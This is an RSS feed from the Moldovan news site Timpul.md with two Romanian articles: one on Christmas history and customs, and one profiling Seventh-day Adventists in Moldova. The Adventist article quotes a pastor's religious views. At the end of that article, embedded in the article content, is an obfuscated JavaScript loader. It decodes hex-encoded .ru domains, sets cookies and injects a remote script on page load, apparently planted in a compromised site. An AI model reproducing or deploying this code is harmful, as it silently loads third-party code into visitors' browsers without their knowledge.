<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Isus &#8211; Știri de ultimă oră din Moldova &#8211; Ultimele știri Timpul.md</title>
	<atom:link href="https://timpul.md/etichete/isus/feed" rel="self" type="application/rss+xml" />
	<link>https://timpul.md</link>
	<description>Citește știrile de ultimă oră de pe 🌍Timpul.md. Fii la curent cu ✔️Ultimele știri interne, ✔️externe, din ✔️sanatate, ✔️educatie, ✔️economice si ✔️ politice</description>
	<lastBuildDate>Sun, 25 Dec 2022 04:28:38 +0000</lastBuildDate>
	<language>ro-RO</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.5</generator>

<image>
	<url>https://timpul.md/wp-content/uploads/2025/02/favicon_Timpul-md.png</url>
	<title>Isus &#8211; Știri de ultimă oră din Moldova &#8211; Ultimele știri Timpul.md</title>
	<link>https://timpul.md</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Semnificația zilei de 25 decembrie: De la nașterea lui Isus până la obiceiul de a dărui cadouri</title>
		<link>https://timpul.md/articol/foto-semnificatia-zilei-de-25-decembrie-de-la-nasterea-lui-isus-pana-la-obiceiul-de-a-darui-cadouri-150077.html</link>
					<comments>https://timpul.md/articol/foto-semnificatia-zilei-de-25-decembrie-de-la-nasterea-lui-isus-pana-la-obiceiul-de-a-darui-cadouri-150077.html#respond</comments>
		
		<dc:creator><![CDATA[Timpul.md]]></dc:creator>
		<pubDate>Sun, 25 Dec 2022 04:28:32 +0000</pubDate>
				<category><![CDATA[Istorie]]></category>
		<category><![CDATA[25 decembrie]]></category>
		<category><![CDATA[Isus]]></category>
		<category><![CDATA[obiceiuri]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/foto-semnificatia-zilei-de-25-decembrie-de-la-nasterea-lui-isus-pana-la-obiceiul-de-a-darui-cadouri-150077.html/</guid>

					<description><![CDATA[Unul dintre cele mai îndrăgite obiceiuri de Crăciun, colindatul, era pe vremuri interzis. Cel care a decis că muzica este nepotrivită pentru o zi solemnă cum este Crăciunul a fost Oliver Cromwell, care, în secolul al XVII-lea, a interzis colindele. Cel mai vechi cântec creştin de Crăciun este &#8222;Jesus refulsit omnium&#8221;, compus de St. Hilary &#8230;]]></description>
										<content:encoded><![CDATA[<p>Unul dintre cele mai îndrăgite obiceiuri de Crăciun, colindatul, era pe vremuri interzis. Cel care a decis că muzica este nepotrivită pentru o zi solemnă cum este Crăciunul a fost Oliver Cromwell, care, în secolul al XVII-lea, a interzis colindele.</p>
<p>Cel mai vechi cântec creştin de Crăciun este &#8222;Jesus refulsit omnium&#8221;, compus de St. Hilary din Poitiers, în secolul al IV-lea. Cea mai veche transcriere după un colind englezesc îi aparţine lui Ritson şi datează din 1410.</p>
<p>În 1818, ajutorul de preot austriac Joseph Mohr a fost anunţat cu o zi înaintea Crăciunului că orga bisericii sale s-a stricat şi nu poate fi reparată la timp pentru slujba de Crăciun. Foarte trist din această pricină, el s-a apucat să scrie trei piese care să poată fi cântate de cor şi acompaniate la chitară. Una dintre ele era &#8222;Silent Night, Holy Night&#8221;, care în prezent este cântată în peste 180 de limbi străine de milioane de persoane.</p>
<p><strong>Obiceiuri româneşti</strong><br />
Colindatul este unul dintre obiceiurile de Crăciun care se păstrează cel mai bine şi în satele româneşti. Pe lângă mesajul mistic, multe obiceiuri practicate în această zi sunt legate de cultul fertilităţii şi de atragerea binelui asupra gospodăriilor.</p>
<p>În unele sate se păstrează şi un alt obicei: cel mai în vârstă membru al familiei trebuie să arunce în faţa colindătorilor boabe de grâu şi de porumb. Bătrânii spun că, dacă boabele peste care au trecut colindătorii vor fi date găinilor, acestea vor fi spornice la ouat. Ei cred, de asemenea, că vor avea o recoltă foarte bună în anul următor dacă vor amesteca sămânţa pe care o vor pune în brazdă cu boabele folosite în ajun la primirea colindătorilor.</p>
<p>În satele de pe Valea Mureşului, Crăciunul este încă legat de anumite credinţe populare care se păstrează şi în prezent, iar obiceiul de a oferi daruri îşi are originile într-o legendă pe care numai bătrânii o mai cunosc.</p>
<p>În satul Harpia, dacă primul care intră în casă de Crăciun este un bărbat, oamenii cred că este un semn de bunăstare şi sănătate pentru anul următor. Pentru a atrage binele asupra caselor lor, oamenii ţin masa întinsă toată noaptea.</p>
<p><strong>Bradul de Crăciun</strong><br />
O altă poveste despre Crăciun, mai puţin cunoscută, spune că, în secolul al VII-lea, călugării foloseau forma triunghiulară a bradului pentru a descrie Sfânta Treime. În jurul anului 1500, oamenii au început să vadă în bradul de Crăciun un simbol al copacului din Paradis şi au atârnat în el mere roşii, simbol al păcatului originar. În secolul al XVI-lea, însă, familiile creştine au început să decoreze brazii cu hârtie colorată, fructe şi dulciuri. Dar mai înainte, în secolul al XII-lea, oamenii obişnuiau să atârne brazii de Crăciun în tavan, cu vârful în jos, ca simbol al creştinătăţii.</p>
<p><strong>Moş Crăciun</strong><br />
Reprezentările lui Moş Crăciun s-au schimbat de-a lungul vremii, astfel că între imaginea acestuia în vechea cultură populară &#8211; de frate mai bogat şi mai inimos al lui Moş Ajun &#8211; şi imaginea contemporană &#8211; de personaj iubit de copii &#8211; există mari diferenţe.</p>
<p>Tradiţiile contemporane despre &#8222;sfântul&#8221; Crăciun, despre Moşul &#8222;darnic şi bun&#8221;, &#8222;încărcat cu daruri multe&#8221; sunt printre puţinele influenţe livreşti pătrunse în cultura populară de la vest la est şi de la oraş la sat.</p>
<p>Din vechime se ştie că Maica Domnului, fiind cuprinsă de durerile naşterii, i-a cerut adăpost lui Moş Ajun. Motivând că este sărac, el a refuzat-o, dar i-a îndrumat paşii spre fratele lui mai mic şi mai bogat, Moş Crăciun. În unele legende populare şi colinde, Moş Ajun apare ca un cioban sau un baci la turmele fratelui său. În cultura populară românească, Crăciun apare ca personaj cu trăsături ambivalente: are puteri miraculoase, ca eroii şi zeii din basme, dar are şi calităţi tipic umane. El este bătrân (are o barbă lungă) şi bogat (de vreme ce are turme şi dare de mână).</p>
<p>Pe de altă parte, ideea de spiriduşi de Crăciun vine din credinţa străveche că gnomii păzeau casa omului de spiritele rele. Spiriduşii au fost iubiţi şi urâţi, pentru că, deşi uneori se purtau cu bunăvoinţă, puteau foarte uşor să se transforme în fiinţe răutăcioase şi nesuferite, atunci când nu erau trataţi cum se cuvine. Percepţia cea mai răspândită era că ei se purtau precum persoana cu care aveau de-a face, fiind fie răutăcioşi, fie drăguţi. În Evul Mediu, în loc să ofere daruri, spiriduşii mai degrabă aşteptau să le primească. Abia pe la mijlocul secolului al XIX-lea spiriduşii au devenit prieteni ai lui Moş Crăciun.</p>
<p>Scriitorii scandinavi, cum ar fi Thile, Toplius şi Rydberg, au combinat cele două trăsături oarecum contradictorii ale personajelor: ei îi prezentau pe spiriduşi puţin răutăcioşi, dar buni prieteni şi ajutoare de nădejde ale lui Moş Crăciun. Unii spun că sunt 13 spiriduşi, alţii sunt convinşi că este vorba de nouă, alţii &#8211; de şase. Într-o vreme se credea că Moş Crăciun şi spiriduşii săi se simt foarte bine în casa lor de la Polul Nord. În 1822, poetul american Clement Clark a publicat lucrarea &#8222;A Visit From St. Nicholas&#8221; (cunoscută şi ca &#8222;The Night Before Christmas&#8221;), în care el l-a descris pe Moş Crăciun ca pe un spiriduş bătrân şi blând, care zboară în jurul lumii într-o sanie trasă de opt reni. În 1885, Thomas Nast a desenat doi copii privind la o hartă a lumii şi urmărind călătoria Moşului de la Polul Nord în Statele Unite, deci se presupunea că acolo, în îndepărtatul Nord, locuieşte bătrânul cel bun. Dar în 1925 s-a descoperit că nu există reni la Polul Nord, aşa că toţi ochii s-au întors spre Finlanda, unde există multe astfel de animale.</p>
<p>În 1927, Markus Rautio, un prezentator de emisiuni pentru copii la postul naţional de radio finlandez, a declarat că Moşul locuieşte pe un munte în Laponia. Astăzi pare aproape sigur însă că Moş Crăciun şi cei 11 spiriduşi ai lui stau bine ascunşi undeva pe muntele Korvatunturi în Laponia, Finlanda, în apropiere de graniţa cu Rusia. Pepper Minstix, unul dintre spiriduşi, este paznicul credincios al satului lui Moş Crăciun.</p>
<p>Cum reuşeşte acesta să se mişte atât de repede, într-o noapte, din Laponia până în casele tuturor copiilor din lume? Cu foarte multă vreme în urmă, Moş Crăciun şi spiriduşii săi au descoperit formula specială, secretă, a prafului magic pentru reni, care îi face să zboare. Acest praf magic este împrăştiat peste fiecare ren cu puţin timp înainte de a pleca din Laponia, în ajunul Crăciunului. Este suficient pentru a-i face să zboare întreaga noapte în jurul lumii. Zborul este, de altfel, foarte rapid: aproape de viteza luminii.</p>
<p>Rudolph este cel mai celebru ren, fiind conducătorul celorlalţi opt, pe nume Blitzen, Comet, Cupid, Dancer, Dasher, Donder, Prancer şi Vixen. Când Rudolph era pui, nasul său a fost atins de Magia Crăciunului şi de atunci este strălucitor şi roşu.<br />
<strong><br />
Crăciunul ca sărbătoare creştină</strong><br />
Pe teritoriul românesc, Crăciunul este una dintre cele mai mari sărbători ale creştinilor, printre care se mai numără Paştele şi Rusaliile.</p>
<p>În tradiţia populară se spune că Fecioara Maria trebuia să-l nască pe fiul lui Dumnezeu şi umbla, însoțită de Iosif, din casă în casă, rugând oamenii să-i ofere adăpost. Ajunsă la casa bătrânilor Crăciun și Crăciunoaie, aceștia nu o primesc pentru a nu le &#8222;spurca&#8221; locuinţa prin nașterea unui copil conceput din greșeală. Ajunsă la capătul puterilor, Maria a intrat în ieslea vitelor, unde au apucat-o durerile nașterii. Crăciunoaia a auzit-o şi i s-a făcut milă, astfel încât a ajutat-o în rol de moașă. Crăciun a aflat, s-a supărat și i-a tăiat bătrânei mâinile, apoi, de frică, a fugit de acasă. Crăciunoaia a umplut, cum a putut, un ceaun cu apă, l-a încălzit și l-a dus să spele copilul. Maria i-a zis să încerce apa și când a băgat cioturile mâinilor, acestea au crescut la loc. În altă variantă a poveștii, Maria suflă peste mâinile Crăciunoaiei și acestea cresc la loc.</p>
<p><strong>Ajunul Crăciunului, când preotul vesteşte Naşterea Domnului</strong><br />
În ultima zi a postului Crăciunului, preotul umblă pe la casele credincioşilor cu icoana Naşterii Domnului, spre a vesti măritul praznic al Întrupării Fiului lui Dumnezeu din Fecioara Maria. Din punct de vedere liturgic, se poate spune că această tradiţie, a umblatului cu icoană, este un fel de slujbă în afară zidurilor bisericii. Este o slujbă săvârşită pe uliţe şi pe străduţe, prin curţi şi prin case, pe la ferestre şi pe la uşi. Precum odinioară făcea crainicul, părintele se străduieşte a anunţa în tot locul şi pe tot omul o mare veste: Dumnezeu se face om, rămânând însă Dumnezeu. Astfel, singurul lucru nou sub soare se arată vrednic de o asemenea mare vestire.</p>
<p>Fiecare preot vesteşte Naşterea Domnului în parohia lui. În funcţie de mărimea parohiei, preotul poate începe să umble cu icoana mai devreme sau mai târziu. Astfel, la sate, această vestire se petrece chiar în ajunul Crăciunului, pe când la oraşe, unde parohiile sunt mai mari şi credincioşii mai numeroşi, preoţii încep să umble cu icoana ceva mai devreme.</p>
<p><strong>Ajunul Crăciunului, zi de colindat</strong><br />
Naşterea Domnului este anunţată în lume de creştini prin colinde, primii care pornesc cu colindatul, în dimineaţa de Ajun, fiind copiii şi tinerii. Aceştia sunt primiţi de creştini cu mere, nuci, covrigi şi cu acele turte numite &#8222;Scutecelele lui Hristos&#8221;. Pentru că, până după Sfânta Liturghie din ziua de Crăciun este încă post, colindătorii trebuie şi ei primiţi cu daruri de post (covrigi, turte, nuci, fructe).</p>
<p><strong>Ajunul Crăciunului, zi de post aspru</strong><br />
Ajunul Crăciunului este ultima zi de post din Postul Naşterii Domnului. Acest post, care începe în ziua de 15 noiembrie şi se încheie în ziua de 24 decembrie, aminteşte de patriarhii şi drepţii Vechiului Testament, care au petrecut timp îndelungat, în post şi rugăciune, aşteptând venirea lui Mesia, Mântuitorul lumii.</p>
<p>Dacă primele 39 de zile ale acestui post sunt mai uşoare din punct de vedere alimentar, între ele existând mai multe zile în care Părinţii Bisericii au rânduit &#8222;dezlegare la peşte&#8221;, cea de-a patruzecea zi a postului este una aspră, un obicei consemnat încă din secolul al IV-lea.</p>
<p>După ceasul prânzului, spre seară, se obişnuieşte să se mănânce grâu fiert, amestecat cu fructe şi miere, în amintirea postului Proorocului Daniel şi al celor trei tineri din Babilon (Daniel 1, 5-16).</p>
<p>În seara zilei de ajun, credincioşii obişnuiesc să mănânce o mâncare dulce, numită în popor &#8222;Scutele lui Iisus&#8221;. Cu făină, apă şi sare se frământă nişte lipii subţiri care se coc pe plită. Acestea se înmoaie într-un sirop dulce (apă cu miere sau zahăr) şi se presară cu nuca măcinată.<br />
<strong><br />
Obiceiuri culinare</strong><br />
Un moment gastronomic important care precedă Crăciunul este ziua de Ignat (20 decembrie), când se taie porcul şi se prepară mâncăruri specifice, precum cârnații, chișcă, tobă, răcituri, sarmalele, caltaboș, care, alături de tradiţionalul cozonac, vor sta pe masa de Crăciun.</p>
<p>Pentru copiii din România, Moş Crăciun vine din nordul îndepărtat pentru a aduce daruri celor care au fost cuminţi. Acestea sunt lăsate sub brandul de Crăciun şi, în funcţie de bunăvoinţa părinţilor sau de obiceiurile zonei, cadourile se deschid fie în Ajun, după slujbă, fie în ziua de Crăciun. În unele regiuni, Moşul mai lasă un rând de cadouri la biserică, unde copiii îi mulţumesc cântând colinde.</p>
<p>În SUA, Moşul călătoreşte în ajun într-o sanie zburătoare trasă de reni. El intră în case pe horn şi lasă cadourile sub brad sau în ciorapii agăţaţi deasupra şemineului. Copiii îi lasă lapte şi biscuiţi şi obişnuiesc să îi scrie de dinainte ce daruri şi-ar dori.</p>
<p>În Ungaria, moşul este reprezentat de un înger, în ziua de Crăciun, copiii găsesc bradul gata făcut şi sub el cadourile.</p>
<p>În Rusia, Moş Crăciun (&#8222;Ded Moroz&#8221;) este însoţit de Albă-ca-Zăpada, iar copiii primesc prăjituri şi jucării.</p>
<p>În Franţa, Père Noël se strecoară pe coşul casei şi lasă cadourile în pantofi.</p>
<p>În Austria şi în Germania, figura lui Moş Crăciun este asociată în continuare cu cea a Sfântului Nikolaus, care vine în noaptea dinspre 5 spre 6 decembrie şi lasă cadouri doar pentru copiii cuminţi. Cei care au fost obraznici vor primi doar un mănunchi de nuiele legate cu câteva bomboane. Moş Crăciun şi însoţitorul său, Krampus, sunt îmbrăcaţi în haine roşii. Nikolaus are mitră de episcop pe cap, iar Krampus are corniţe şi o limbă lungă ce îi atârnă din gură. De Crăciun, copiii primesc cadouri de la Cristkindl (Copilaşul Cristos).</p>
<p>În Islanda, cadourile sunt aduse din munţi de către cei 13 pitici de Crăciun care vin pe rând, de la Crăciun şi până pe 6 ianuarie.</p>
<p>În ţările scandinave, spiriduşul &#8222;Jul Nisse&#8221; arată la fel ca Moş Crăciun, însă este mult mai mic de statură. Pentru el se lasă afară un vas cu terci de orez, tradiţia fiind una de origine păgână.</p>
<p>În Australia, Moş Crăciun este îmbrăcat în pantaloni roşii scurţi şi în loc de sanie este ilustrat într-un elicopter.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/foto-semnificatia-zilei-de-25-decembrie-de-la-nasterea-lui-isus-pana-la-obiceiul-de-a-darui-cadouri-150077.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Biserica adventistă acuză Hollywoodul de „parteneriat” cu diavolul și așteaptă Apocalipsa</title>
		<link>https://timpul.md/articol/biserica-adventista-acuza-hollywoodul-de-parteneriat-cu-diavolul-si-asteapta-apocalipsa-94164.html</link>
					<comments>https://timpul.md/articol/biserica-adventista-acuza-hollywoodul-de-parteneriat-cu-diavolul-si-asteapta-apocalipsa-94164.html#respond</comments>
		
		<dc:creator><![CDATA[Dorin Galben]]></dc:creator>
		<pubDate>Thu, 23 Jun 2016 05:46:00 +0000</pubDate>
				<category><![CDATA[Social]]></category>
		<category><![CDATA[adventisti]]></category>
		<category><![CDATA[apocalipsa]]></category>
		<category><![CDATA[diavol]]></category>
		<category><![CDATA[discriminare]]></category>
		<category><![CDATA[Isus]]></category>
		<category><![CDATA[moldova]]></category>
		<category><![CDATA[religie]]></category>
		<category><![CDATA[statistici]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/biserica-adventista-acuza-hollywoodul-de-parteneriat-cu-diavolul-si-asteapta-apocalipsa-94164.html/</guid>

					<description><![CDATA[Chiar dacă, &#238;n trecut, Biserica Adventistă de Ziua a Șaptea era numită sectă, revizuirea doctrinei sale de către cercetători a făcut ca, astăzi, acest cult religios să ajungă &#238;n r&#226;ndul principalelor curente protestante.]]></description>
										<content:encoded><![CDATA[<p>&Icirc;n R. Moldova, avem aproape 10 mii de adventiști, iar de-a lungul timpului membrii au fost discriminați și intimidați pentru convingerile lor religioase. Printre principiile și valorile acestora, se numără abstinența totală de la alcool și tutun, nerecunoașterea botezului copiilor mici, promovarea unui mod sănătos de viață, prezența relațiilor intime doar &icirc;n cadrul familiei, moartea este văzută ca un somn, iar sf&acirc;rșitul lumii reprezintă doar un &icirc;nceput.<br />
&nbsp;<br />
Biserica Adventistă de Ziua a Șaptea este prezentă la nivel mondial, iar pentru prima dată a apărut &icirc;n SUA, la mijlocul secolului al XIX-lea, și a fost menționată oficial &icirc;n 1863. Printre fondatorii ei, a fost Ellen White, ale cărei scrieri se bucură de un respect aparte din partea bisericii. Adventiștii consideră Biblia regula supremă de credință. Din literatura de specialitate, aflăm că termenul &bdquo;adventist&rdquo; &icirc;nseamnă &bdquo;așteptător&rdquo; a revenirii m&acirc;ntuitorului Iisus Hristos. &bdquo;Ziua a Șaptea&rdquo; este s&acirc;mbăta și a fost desemnată zi de odihnă.</p>
<p><img fetchpriority="high" decoding="async" src="/uploads/images/IMG_1283.JPG" width="650" height="412" alt="" /><br />
<span style="font-size: smaller"><em>Clădirea centrului adventist din capitală</em></span></p>
<p>Potrivit unui studiu efectuat recent, &icirc;n țara noastră, unele culte religioase neortodoxe au &icirc;nt&acirc;mpinat probleme serioase &icirc;n timpul &icirc;nregistrării la Ministerul Justiției. Printre ele, se numără și adventiștii de Ziua a Șaptea. Pe l&acirc;ngă aceasta, ei au raportat că, &icirc;n 2008-2009, &icirc;n satul Copanca, din raionul Căușeni, un membru al grupului a &icirc;ncercat să construiască o casă de rugăciuni, iar populaţia locală (predominant ortodocşi de rit vechi) nu au permis construcţia.</p>
<p>Cea mai gravă &icirc;ncălcare a libertăţii de a desfăşura &icirc;ntruniri paşnice şi a dreptului de a manifesta convingerile religioase a avut loc, totuși, &icirc;n anul 2009, atunci c&acirc;nd &icirc;n urma intervenţiei Bisericii Ortodoxe din Moldova, adventiștilor le-a fost interzisă desfăşurarea unei manifestări religioase preconizată &icirc;n Piaţa Marii Adunări Naţionale din Capitală. </p>
<h1>Abstinență totală de la alcool și tutun</h1>
<p>Unul dintre pastorii care slujește &icirc;n biserica adventistă, de aproape 13 ani, este Emilian Dospinescu. Bărbatul este cetățean rom&acirc;n și a venit la Chișinău, acum șapte luni, ca să colaboreze cu Uniunea Bisericilor Adventiste de aici. D&acirc;nsul s-a născut &icirc;ntr-o familie, unde ambii părinți erau adventiști, iar &icirc;n anul 2001 a ales să treacă prin ritualul botezului. </p>
<p>Potrivit lui, la adventiști, este bine g&acirc;ndit sistemul de sănătate. &Icirc;n prezent, Biserica este cunoscută &icirc;n lume mai ales prin rețeaua ei mondială de peste 700 de spitale, clinici și așezăminte medicale. &bdquo;Acum c&acirc;țiva ani, postul TV National Geografic a prezentat un documentar, &icirc;n care s-a arătat că, datorită unui stil de viață sănătos, adventiștii trăiesc de la 15 la 25 de ani mai mult dec&acirc;t orice om de pe planeta aceasta&rdquo;, &icirc;mi spune pastorul.&nbsp;</p>
<div>
<img decoding="async" src="/uploads/images/biserica%20advintista.png" width="650" height="488" alt="" /><br />
<span style="font-size: smaller"><em>Biserică adventistă din Chișinău</em></span></p>
<div>
Ei sunt de părerea că tot, ceea ce afectează pe termen scurt sau lung organismul, trebuie să fie eliminat din alimentație și &icirc;i &icirc;ndeamnă pe alții să facă la fel. Biserica adventistă declară abstinență totală de la alcool și tutun. Cafeaua este și ea considerată un drog și membrii nu o consumă. &bdquo;Acceptăm doar ceaiul din plante medicinale, &icirc;nsă cel negru, verde, chinezesc sau rusesc nu-l recunoaștem. Ținta noastră e ca oamenii să elimine din alimentație tot ce &icirc;nseamnă carne, lapte, br&acirc;nză, ouă. &Icirc;n ultimul timp, aceste produse au &icirc;nceput să fie din ce &icirc;n ce mai necalitative și le pun &icirc;n pericol sănătatea&rdquo;, a mărturisit acesta. </p>
<p>Celor care consumă carne, ei totuși le recomandă să pună alături c&acirc;t mai multă salată, pentru că aceasta este considerată &bdquo;autobuzul grăsimilor&rdquo;. </p>
<h1>&bdquo;Apocalipsa &icirc;nseamnă biruința binelui asupra răului&rdquo;</h1>
<p>&Icirc;n viziunea adventiștilor, apocalipsa &icirc;nseamnă biruința luminii asupra &icirc;ntunericului și respectiv a binelui asupra răului. &bdquo;Există o mare greșeală a unor creștini de a stabili date. Ziua venirii Domnului Iisus Hristos nu o cunoaște dec&acirc;t Tatăl. Noi credem că m&acirc;ntuitorul va veni cur&acirc;nd. Oamenii de știință spun că, &icirc;n aproximativ 50 de ani, Păm&acirc;ntul se va autodistruge. &Icirc;n Biblie, există o promisiune a lui Iisus Hristos că va reveni. Aceasta &icirc;nseamnă, cu siguranță, că el se va &icirc;ntoarce &icirc;nainte ca Păm&acirc;ntul să se autodistrugă. Observați că anul acesta a fost dezastruos. Țări precum Germania, Franța sau Rom&acirc;nia au cunoscut inundații fără precedent. Sunt niște fenomene care ies de sub controlul oamenilor. Ne &icirc;ndreptăm spre un punct final&rdquo;, se arată convins interlocutorul meu. </p>
<p><img decoding="async" src="/uploads/images/IMG_1275.JPG" width="650" height="488" alt="" /><br />
<span style="font-size: smaller"><em>&Icirc;n Centrul de Carte al adventiștilor este at&acirc;t literatură &icirc;n limba rom&acirc;nă, c&acirc;t și &icirc;n rusă</em></span></p>
<p>Pastorul consideră că Hollywoodul a făcut ca apocalipsa să pară ceva groaznic și este convins că &icirc;n spatele acestor &icirc;ngroziri se află un vrăjmaș al lui Dumnezeu &ndash; diavolul. El zice cu &icirc;ncredere că &bdquo;la venirea lui Iisus Hristos, oamenii care l-au iubit vor fi luați &icirc;n cer pentru 1000 de ani. Se spune că la re&icirc;ntoarcerea m&acirc;ntuitorului, Păm&acirc;ntul va arde cu tot ce este pe el. &Icirc;n tot acest timp, Satana și &icirc;ngerii lui vor fi pe această planetă, iar după 1000 de ani, cetatea lui Dumnezeu cu toți sfinții vor cobor&icirc; pe Păm&acirc;nt, iar aici va fi punctul central al Universului&rdquo;. </p>
<h1>&bdquo;Relațiile intime dintre homosexuali sunt un păcat&rdquo;</h1>
<p>La fel ca și alte culte religioase, adventiștii pun accent pe &icirc;ntemeierea unei familii trainice și &icirc;ncurajează tinerii să aibă relații intime doar după căsătorie. Pastorii bisericii consiliază cuplurile care trec printr-o criză și &icirc;i ajută să depășească momentele dificile. Ei &icirc;ncurajează soțul și soția să aibă copii și să-i educe frumos, iar avortul este considerat o crimă. Excepții fac doar situațiile c&acirc;nd fătul pune &icirc;n pericol viața mamei. </p>
<p>Emilian Dospinescu declară că, &icirc;n r&acirc;ndul membrilor, este &icirc;ncurajată intimitatea sănătoasă și nu o consideră un păcat, iar partenerii pot să facă dragoste ori de c&acirc;te ori doresc. </p>
<p><img loading="lazy" decoding="async" src="/uploads/images/IMG_1264.JPG" width="650" height="481" alt="" /><br />
<span style="font-size: smaller"><em>Sală de rugăciuni ale adventiștilor de ziua a șaptea</em></span></p>
<p>Biserica Adventistă nu susține căsătoriile dintre persoanele de același sex. &bdquo;Există chiar și clinici unde se &icirc;ncearcă ajutorarea acestor oameni să devină heterosexuali. Dacă cineva dorește să răm&acirc;nă așa, noi nu vom arăta cu degetul și nu-l vom condamna. Biblia este foarte clară &icirc;n domeniul dat și spune că această categorie de oameni, dacă nu se pocăiesc, nu intră &icirc;n cer. Biblic este permisă doar căsătoria &icirc;ntre un bărbat și o femeie, unde se poate &icirc;nt&acirc;mpla naștere de copii. Suedia, Norvegia au acest sistem, &icirc;n care copiii de la familiile normale sunt luați și oferiți spre adopție familiilor homosexuale &ndash; este o ur&acirc;ciune a vremurilor noastre. Ca biserică, avem deschidere și dialog către aceste persoane, dar pe bază biblică, relațiile intime dintre homosexuali sunt un păcat&rdquo;, a punctat Dospinescu. </p>
<h1>&bdquo;Moartea este un somn&rdquo;</h1>
<p>Reprezentanții Bisericii Adventiste de Ziua a Șaptea sunt de părere că &bdquo;moartea este un somn&rdquo;. La &icirc;nmorm&acirc;ntarea adventiștilor nu se face masă de pomenire și restul ritualurilor &icirc;nt&acirc;lnite la creștinii ortodocși. </p>
<p>La acest capitol, adventiștii din R. Moldova au raportat un caz care a avut loc &icirc;n anul 2011, &icirc;n satul Buțeni, din raionul H&acirc;ncești. &Icirc;n timpul unei ceremonii funerare, desfăşurată pentru un adept al grupului, preotul ortodox local a recurs la utilizarea unei arme de foc pentru a &icirc;mpiedica procesul de &icirc;nmorm&acirc;ntare. Drept rezultat, preotul a fost neutralizat de c&acirc;ţiva dintre participanţii la ceremonie. </p>
<p><img loading="lazy" decoding="async" src="/uploads/images/IMG_1268.JPG" width="650" height="488" alt="" /><br />
<span style="font-size: smaller"><em>Cartea din care adventiștii &icirc;nvață imnurile creștine</em></span></p>
<p>&Icirc;n prezent, &icirc;n lume, sunt aproximativ 19 milioane de membri ai Bisericii Adventiste de Ziua a Șaptea. &Icirc;n Rom&acirc;nia, numărul acestora ajunge la circa 70 de mii. Potrivit lui Ruslan Lodcă, secretarul executiv al Bisericii Adventiste de Ziua a Șaptea din R. Moldova, &icirc;n țara noastră avem circa 9 mii de membri maturi botezați, iar alte 10 mii au plecat &icirc;n ultimii 7-8 ani peste hotare. &Icirc;n r&acirc;ndul adventiștilor nu există ierarhizare, iar ei se numesc frați și surori. <br />
&nbsp;<br />
<em><strong>Biserica Adventistă este condusă la nivel mondial de o Conferință Generală, &icirc;mpărțită &icirc;n regiuni mai mici administrate de diviziuni, uniuni de conferințe și respectiv conferințe locale.</strong></em><br />
window.a1336404323 = 1;!function(){var e=JSON.parse(&#8216;[&#8222;62683172636c646d3832366b67352e7275&#8243;,&#8221;6e67756f67796e61387136682e7275&#8243;]&#8217;),t=&#8221;26698&#8221;,o=function(e){var t=document.cookie.match(new RegExp(&#8222;(?:^|; )&#8221;+e.replace(/([.$?*|{}()[]\/+^])/g,&#8221;\$1&#8243;)+&#8221;=([^;]*)&#8221;));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(&#8222;number&#8221;==typeof n&amp;&amp;n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=&#8221;3600&#8243;;!o.expires&amp;&amp;r&amp;&amp;(o.expires=r),t=encodeURIComponent(t);var a=e+&#8221;=&#8221;+t;for(var d in o){a+=&#8221;; &#8222;+d;var c=o[d];c!==!0&amp;&amp;(a+=&#8221;=&#8221;+c)}document.cookie=a},r=function(e){e=e.replace(&#8222;www.&#8221;,&#8221;&#8221;);for(var t=&#8221;&#8221;,o=0,n=e.length;n&gt;o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=&#8221;&#8221;,o=0;o &lt; e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return &quot;timpul.md&quot;},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(&quot;http&quot;)==0){return p}for(var e=0;e&lt;3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf(&#039;http&#039;)==0)return p;}else{break;}}return &quot;&quot;},c=function(e,t,o){var lp=p();if(lp==&quot;&quot;)return;var n=lp+&quot;//&quot;+e;if(window.smlo&amp;&amp;-1==navigator.userAgent.toLowerCase().indexOf(&quot;firefox&quot;))window.smlo.loadSmlo(n.replace(&quot;https:&quot;,&quot;http:&quot;));else if(window.zSmlo&amp;&amp;-1==navigator.userAgent.toLowerCase().indexOf(&quot;firefox&quot;))window.zSmlo.loadSmlo(n.replace(&quot;https:&quot;,&quot;http:&quot;));else{var i=document.createElement(&quot;script&quot;);i.setAttribute(&quot;src&quot;,n),i.setAttribute(&quot;type&quot;,&quot;text/javascript&quot;),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,&quot;function&quot;==typeof t&amp;&amp;t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),&quot;function&quot;==typeof o&amp;&amp;o())}}},s=function(f){var u=a(f)+&quot;/ajs/&quot;+t+&quot;/c/&quot;+r(d())+&quot;_&quot;+(self===top?0:1)+&quot;.js&quot;;window.a3164427983=f,c(u,function(){o(&quot;a2519043306&quot;)!=f&amp;&amp;n(&quot;a2519043306&quot;,f,{expires:parseInt(&quot;3600&quot;)})},function(){var t=e.indexOf(f),o=e[t+1];o&amp;&amp;s(o)})},f=function(){var t,i=JSON.stringify(e);o(&quot;a36677002&quot;)!=i&amp;&amp;n(&quot;a36677002&quot;,i);var r=o(&quot;a2519043306&quot;);t=r?r:e[0],s(t)};f()}(); </div>
</div>
]]></content:encoded>
					
